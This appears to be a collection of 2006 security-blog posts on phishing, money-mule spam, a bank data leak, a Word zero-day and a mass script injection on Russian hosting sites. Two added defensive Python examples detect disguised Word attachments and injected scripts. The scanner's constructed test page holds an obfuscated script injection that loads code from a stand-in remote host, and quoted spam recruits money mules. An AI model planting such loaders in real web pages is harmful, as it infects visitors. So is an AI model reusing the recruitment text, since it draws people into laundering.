The situation with phishing runs targeted at Dutch banks has remained the same throughout 2006 - very quiet. I started noticing that the criminals were strategically planning their attacks by mostly using holidays to carry out their spam runs. By doing this they were hoping to increase the response time of the people involved in combatting these threats.
Just as I had expected there was a phishing run against the Dutch Postbank on Monday, the first day of Christmas. Although it was Christmas the overall response time from the parties involved didn't really suffer. So that's good.
We detected the phishing sample proactively as Trojan-Spy.HTML.Fraud.gen.
Today we noticed an interesting side effect of this phishing run.
The link in the address bar is the one spoofed in the phishing email. Firefox makes use of Google's anti-phishing database. Since the fraudulent site was also detected, Google accidentally added both sites to the database.
We've reported this to Google. Let's hope this gets fixed soon as quite a lot of Dutch people are worried about this.
By the way, there seems to be a bug in Firefox: for currently unknown reasons, the Firefox build we tested only flags the site after switching tabs.
We always expect a rise in cyber crime in the holiday season. This year, for instance, we have seen a noticeable rise in spam, along with a rise in phishing.
I have even received a phishing email in my Gmail mailbox – the first one in ages. The phish was nothing special; the usual notification about a new payment system for an online bank with a link to the spoofed website.
What caught my eye was how Google handled the phish. The Gmail interface added a number of relevant paid advertising links to the email. Take a look at the upper left and lower right corners:
I think that adding such links increases user trust in fraudulent emails. Users see that Google has included keyword-related links, so they are liable to trust the email – and fall victim to the phishing scam.
What do you think? In any case, holidays are unfortunately a busy time for criminals in all spheres, including the Internet. Take care of yourself and safe surfing!
When I have a free 10 - 15 minutes, I sometimes use the time to look at the latest spam. Of course, our antispam program filters it out to a dedicated directory. (I do wonder, though, why spammers persist in sending spam to @kaspersky.com).
Spam can be interesting reading - in English and Russian - I can't read the Japanese or Chinese spam :-) Of course mostly it's fake or grey market medicine, pirate software, designer watches, financial scams etc. etc. ad nauseam ad infinitum.
But I’m starting to see more and more spam which offers a great earning opportunity: work as an agent transferring money via your account to the accounts of some company's clients. And the company will pay the transfer fees. Here are a couple of English-language examples.
A large European electronics wholesaler OLDI Computers LLC is looking for representatives in Your region. This job will let You make from $500.00 a week. Your duties will include receiving payments from our customers and sending the money to our company via Western Union or Money Gram. You will need to establish a banking account with one of the Your region banks or to use Your personal bank account.
Greetings to everyone who has recieved this letter from us, we which you a best luck in the next year and best luck with us, with our offer. You already know that two biggest events of the year are very close to us and soon will finally be here. Merry Christmas and New Years. We want to which you a best luck already and as a gift we want to offer you a job.
Our company currently is seeking for people who can help us out and earn good money for themselves. We need as many people as possible. You can consider this opportunity as a Christmas Job. You will be able to make quick money everyday, spending 1-3 hours a day, no knowledge requiered, no past experience, anyone can apply. You must be 18+ y/o, you have to be an honest person and responsible. You will like working with us, it will be convenient and easy. Our Big Benefits: 1. You will spend not more than 1-3 hours a day. 2. We pay out everyday. 3. $600-$900 a week guaranteed. To start working with us you need to fill out application at our website http://www..[censored]..com click on "Regsiter" and procceed with registration. When done, we will contact you over the phone and you can consider yourself already part of our team. Sign up right now, time is money and Christmas is almost here, so hurry up!
Of course, paying through a third party's account rather than paying the company directly has to be a scam. In cases like this, the recipient is being invited to take part in money laundering - and who would agree to that?
But there must be people who do agree, either because they want the money, or because they’re gullible by nature. I’ve got two questions: how much money do these intermediaries ever see, and are law enforcement bodies really ready (in terms of legislative support) to cope with such scams?
The Russian black market is getting a lot of publicity at the moment in the Russian media. Why? Because of the latest data theft case - databases allegedly containing the personal details of upwards of 3 million individuals have been leaked from several major Russian banks, and the data is now being sold for between 2,000 - 4,000 roubles (around $76 - $150).
Of course, this is nothing new in any country - there have been lots of high profile reports about data leakage. And in a recent article I highlighted that databases containing data from the customs and passport authorities (among others) are freely available on the Russian black market.
What’s interesting is the media fuss, and the effect it might have on data security. The databases contain information about clients of Russian banks who’ve been refused credit, and those who’ve defaulted, either partially or fully, on their payments. Some journalists have questioned why such data would be of use to criminals. As credit applications in Russia include personal data like name, address, and passport number, I don’t think this is such a hard question to answer. Similar cases of data theft in the past have led to a wave of scams - one option would be to buy the database, call a debtor and say that you're calling from the bank to collect the debt.
Even though data theft is relatively common in Russia, the media attention might raise public awareness about data security. The case will certainly be a blow to the Russian public's fragile confidence in the banking sector, and it may take a while for the dust to settle. But let's hope that while it’s settling law enforcement agencies will take a long hard look at current cybercrime legislation. And let's also hope that the banking industry will consider making a standard security policy mandatory.
Microsoft has released its latest scheduled patches for a large number of vulnerabilities. Some of them are rated critical, so if you haven't already done so, download the updates and patch your systems now.
Over at the SANS Internet Storm Center, the handlers have put together a very useful table. It includes CVE numbers and notes on whether exploits are known for each vulnerability.
Google Translate seems to think so! And it works in both directions...
Update 12.12.06: Google Translate has now fixed this issue.
A couple of days ago the Süddeutsche Zeitung (a German newspaper) reported on a new type of search tool which the German Federal Office of Criminal Investigation would like to use in future. Instead of having to go through the tedious formalities of obtaining access to a suspect’s house and confiscating any computers there, a law enforcement agency would be able to remotely access and monitor a suspect’s machine.
Of course, no details are given about how this would be done, or how exactly access to the data would be obtained. But regular readers of this blog might remember my post about a Swiss counterpart: spyware written for use by the authorities to track suspects. No further information was given about how that software would be installed, either. Two possible methods would be installation via unpatched vulnerabilities in operating systems or other software, or the classic method of sending the program as an email attachment and banking on the user opening and launching it.
So the Suddeutsche Zeitung article isn’t the first report we’ve seen about malware financed by the authorities, and it certainly won't be the last. If we assume that every country of a reasonable size is currently developing (or using) its own Trojan program, then it's only a matter of time before we get a sample of one of these things. And who knows - it could be that we’ve already got one without knowing exactly what it is. After all, a Trojan used by the authorities is hardly likely to send data it harvests to an easily identifiable police server...
'Patch Tuesday' looms again: the next scheduled Security Bulletin release is 12th December, so get ready for next week's patches.
Hopefully, Microsoft will manage to include a patch for the vulnerability currently being exploited in what the company refers to as 'limited "zero-day" attacks'. The vulnerability is present in Microsoft Word 2000, Microsoft Word 2002, Microsoft Office Word 2003, Microsoft Word Viewer 2003, Microsoft Word 2004 for Mac, and Microsoft Word 2004 v. X for Mac, as well as Microsoft Works 2004, 2005, and 2006.
It seems the attack can only be carried out if a user first opens a malicious Word file which is attached to an email or has been delivered by the attacker in some other way.
Doubtless Microsoft will provide more information as investigations proceed; we're monitoring the situation. In the meantime, Microsoft is advising its customers as 'a best practice', to exercise extreme caution when opening unsolicited attachments from both known and unknown sources.
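Since the attack described above depends on the user opening a Word file that arrives as an attachment, a mail gateway check is worth more than a filename rule: an attacker can call the file whatever they like and declare any MIME type. The following example identifies Word 97-2003 documents by their container signature (the OLE2 compound-file header) rather than by name or declared type. It is an added example, not code from the original post or from Microsoft; the message it inspects is constructed, and the "document" inside it is only an OLE2 header followed by padding, not a real Word file.

```python
"""Walk an e-mail and flag attachments that are OLE2 compound documents
(the on-disk container of Word 97-2003 .doc files), judged by the file's
magic bytes rather than by its filename or declared MIME type.

Added example; not code from the original post or from Microsoft.
The message below is constructed; the "document" is just an OLE2 header
followed by padding, not a real Word file."""
import email
from email.message import EmailMessage

OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # OLE2 / Compound File header


def ole_attachments(raw_message: bytes):
    """Return [(filename, declared content type)] for every part whose
    decoded payload begins with the OLE2 magic, whatever it calls itself."""
    msg = email.message_from_bytes(raw_message)
    hits = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue                      # container, not content
        payload = part.get_payload(decode=True) or b""
        if payload.startswith(OLE2_MAGIC):
            hits.append((part.get_filename() or "<unnamed>", part.get_content_type()))
    return hits


def build_sample() -> bytes:
    """Constructed message: one benign text attachment, one OLE document
    disguised with a .txt name and a text/plain MIME type."""
    msg = EmailMessage()
    msg["From"] = "hr@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Your contract"
    msg.set_content("Please review the attached contract.")
    msg.add_attachment(b"just notes\n", maintype="text", subtype="plain",
                       filename="notes.txt")
    fake_doc = OLE2_MAGIC + b"\x00" * 504     # minimal stand-in for a .doc body
    msg.add_attachment(fake_doc, maintype="text", subtype="plain",
                       filename="contract.txt")
    return bytes(msg)


if __name__ == "__main__":
    for name, ctype in ole_attachments(build_sample()):
        print(f"OLE document disguised as {name} ({ctype})")
```

The same header is shared by Excel and PowerPoint binary formats, so a hit means "Office binary container", which is still the right thing to quarantine or sandbox while a Word parser bug is being exploited in the wild.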
I've just bumped into some social engineering on a massive scale - spam that hit a huge number of message boards at once.
It’s pretty elementary in some ways - a post which says
Andre call me ,please ! Or my ICQ – 256***** .Sorry for offtop o:( .
Of course, the message won’t have a long life span - spam like this gets deleted pretty quickly from well moderated boards. This means, of course, that spammers have to continually think up new ways to grab a user’s interest.
Anyone who’s curious, or foolish enough, to try contacting the ICQ number could end up receiving anything, ranging from unsolicited advertising to a link to a brand new worm. Yesterday’s spam is a clear attempt to move away from a banal offer towards dialogue with the user. After all, an ICQ number could easily have a bot at the other end - a bot which might even manage to persuade the user that it’s a human being. And if a user thinks there’s a human being on the other side of the screen, s/he’s all the more likely to open any links sent...including those that lead to new malware.
Already in its 9th edition, AVAR has established itself as an important security event where the information presented can be just as exotic as the locations where it's held. The location chosen for this year's edition was Auckland, New Zealand - the home of the Maori, the Kiwi and the "All Blacks", the number one rugby team in the world. The architecture is just as impressive.
The subjects covered new threats such as mobile malware and VoIP attacks but also classic questions such as phishing, Virtual Machines, and last but not least, classification and virus naming.
An interesting presentation was given by Jonathan Poon from Microsoft, who spoke about their in-house release scanning system. This system is how Microsoft provides its software, both online and boxed, in a malware-free form. Jonathan maintains a personal weblog where he regularly writes about security and malware from his unique perspective. Feel free to check it out.
One of the most discussed subjects at AVAR 2006 has been the decreasing prevalence of global virus outbreaks and the huge rise in local and targeted attacks. Along with user education and security awareness, these will probably be our main focus points in 2007.
Yesterday, one of our users contacted us to tell us about the strange behaviour of his browser. He’d been looking at www.5755.ru - his browser opened a second web page, and his Web anti-virus warned him that a Trojan program was being downloaded.
The user went to this site after he'd seen it advertised on television. He almost fell victim to a malicious attack - the site’s homepage contained a script that downloads Trojan-Downloader.JS.Psyme.ct, which in turn downloads Trojan-Downloader.Win32.Tiny.eo. Of course, the malicious programs placed on the site change from day to day, but happily, the Web anti-virus module in Kaspersky Anti-Virus 6.0 prevented this user from getting infected.
After investigating this a bit further, it turned out that at least 470 other servers had been subject to the same attack. We found this out by searching Google for a string from the script that had been injected into the site.
All these servers had one thing in common - they were all hosted by Valuehost, the biggest hosting provider in Russia, which offers a home to more than 60,000 Russian web sites. Of course, the Valuehost administrators have been informed of the problem.
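The injection described above can be recognised mechanically: a script or iframe that loads code from a host other than the site's own, often hidden inside a JavaScript unescape() call so that the tag does not appear in the page source as plain text. The following example decodes such blobs, reports the foreign host, and groups pages by the raw injected string, which is the same string one would paste into a search engine to find other compromised servers. It is an added example, not code from the original post or from Valuehost; the page fragments are constructed and the remote host in them is invented.

```python
"""Scan page HTML for an injected script or iframe that pulls code from a
foreign host, including one hidden inside a JavaScript unescape() call,
and group pages by the raw injected string so the same injection can be
recognised across many sites.

Added example; not code from the original post or from Valuehost.
The page fragments are constructed and the remote host is invented."""
import re
from urllib.parse import unquote, urlparse

# unescape('...') / unescape("...") blobs, typical of script droppers
UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.I | re.S)
# any <script ... src=...> or <iframe ... src=...>, through the closing '>'
SRC_RE = re.compile(r"""<(?:script|iframe)\b[^>]*\bsrc\s*=\s*['"]?([^'" >]+)[^>]*>""", re.I)


def _remote_host(url, site_host):
    """Host of url if it is neither relative nor the site's own host, else ''."""
    host = (urlparse(url).hostname or "").lower()
    return host if host and host != site_host.lower() else ""


def injected_scripts(html, site_host):
    """Return one (tag, remote host, raw search string) per script/iframe
    that loads from a host other than site_host.  The raw search string is
    the literal text as it sits in the page, so it can be searched for in
    other pages or in a search engine."""
    hits = []
    for m in UNESCAPE_RE.finditer(html):          # tags hidden in unescape()
        decoded = unquote(m.group(2))
        for s in SRC_RE.finditer(decoded):
            host = _remote_host(s.group(1), site_host)
            if host:
                hits.append((s.group(0), host, m.group(0)))
    for s in SRC_RE.finditer(html):               # tags in plain sight
        host = _remote_host(s.group(1), site_host)
        if host:
            hits.append((s.group(0), host, s.group(0)))
    return hits


def pages_sharing_injection(pages):
    """pages: {host: html}.  Map each raw injected string to the set of
    hosts carrying it; a large set means one compromise hit many sites."""
    groups = {}
    for host, html in pages.items():
        for _, _, raw in injected_scripts(html, host):
            groups.setdefault(raw, set()).add(host)
    return groups


PAGE_CLEAN = ("<html><body><h1>Shop</h1>"
              "<script src='/js/menu.js'></script></body></html>")
# constructed: an injected block appended after the page's own markup
PAGE_INFECTED = PAGE_CLEAN + (
    "<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2F"
    "198.51.100.23%2Fcounter%2Fad.js%22%3E%3C%2Fscript%3E'))</script>"
)

if __name__ == "__main__":
    for tag, host, raw in injected_scripts(PAGE_INFECTED, "shop.example"):
        print(f"remote load from {host}: {tag}\n  search for: {raw}")
    sites = {"a.example": PAGE_INFECTED, "b.example": PAGE_INFECTED,
             "c.example": PAGE_CLEAN}
    for raw, hosts in pages_sharing_injection(sites).items():
        print(f"{len(hosts)} sites share: {raw[:40]}...")
```

Grouping by the raw string rather than by the decoded tag matters on a shared-hosting estate: one mass compromise leaves an identical blob on every site, while legitimate off-site loads (analytics, ad networks) vary from page to page.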